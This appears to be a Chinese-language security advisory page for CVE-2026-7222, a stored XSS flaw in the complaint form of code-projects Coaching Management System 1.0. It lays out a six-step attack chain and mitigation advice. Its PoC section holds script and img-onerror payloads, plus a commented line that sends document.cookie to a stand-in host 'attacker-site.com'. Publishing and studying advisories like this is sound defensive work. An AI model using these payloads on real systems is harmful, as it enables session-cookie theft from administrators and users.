IPBUF安全漏洞报告
English
CVE-2026-7222 CVSS 3.5 低危

CVE-2026-7222: Coaching Management System存储型XSS漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7222
漏洞类型
跨站脚本攻击 (XSS)
CVSS评分
3.5 低危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
code-projects Coaching Management System

相关标签

XSS存储型XSSCoaching Management SystemCVE-2026-7222Web安全低危漏洞

漏洞概述

该漏洞存在于code-projects Coaching Management System 1.0版本中。攻击者可在投诉表单页面的Complaint参数注入恶意脚本,导致存储型XSS。当管理员或其他用户查看投诉时,恶意脚本将在其浏览器中执行,可能窃取凭证或进行恶意操作。

技术细节

漏洞位于Coaching Management System 1.0的/cims/modules/student/complaint.php文件。该文件在处理用户提交的“Complaint”参数时,未对特殊字符(如<, >, &, ', ")进行有效的转义或过滤。攻击者利用低权限账户登录后,可在投诉内容中构造恶意Payload(如<script>alert(1)</script>)。该Payload被持久化存储至数据库。当具有更高权限的管理员或其他用户登录系统并查看该投诉记录时,系统会直接从数据库读取并渲染该内容,导致恶意脚本在受害者浏览器上下文中执行。此过程利用了Web应用对输出编码的缺失,属于典型的存储型跨站脚本漏洞。

攻击链分析

STEP 1
侦察
识别目标系统为code-projects Coaching Management System 1.0。
STEP 2
获取权限
注册或登录一个普通学生账户(低权限账户)。
STEP 3
漏洞利用
访问投诉页面(/cims/modules/student/complaint.php),在Complaint字段输入恶意JavaScript代码并提交。
STEP 4
持久化
服务器将包含恶意代码的投诉信息存储到数据库中。
STEP 5
触发攻击
诱导或等待管理员/其他用户查看该投诉信息页面。
STEP 6
执行载荷
受害者的浏览器解析页面时执行恶意脚本,攻击者获取Cookie或执行其他操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for Stored XSS in CVE-2026-7222 --> <!-- Target File: /cims/modules/student/complaint.php --> <!-- Parameter: Complaint --> <!-- 1. Login as a student/user with low privileges --> <!-- 2. Navigate to the Complaint Form --> <!-- 3. Inject the following payload into the 'Complaint' input field --> <script> alert('CVE-2026-7222 XSS Triggered'); // Example: Steal session cookie // var i = new Image(); // i.src = "http://attacker-site.com/steal?cookie=" + document.cookie; </script> <!-- Alternatively, use image tag to bypass some filters --> <img src=x onerror=alert('XSS')>

影响范围

code-projects Coaching Management System 1.0

防御指南

临时缓解措施
建议暂时禁用投诉模块功能,或在Web应用防火墙(WAF)中部署规则,拦截包含<script>、onerror等关键字的请求,防止恶意脚本入库。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表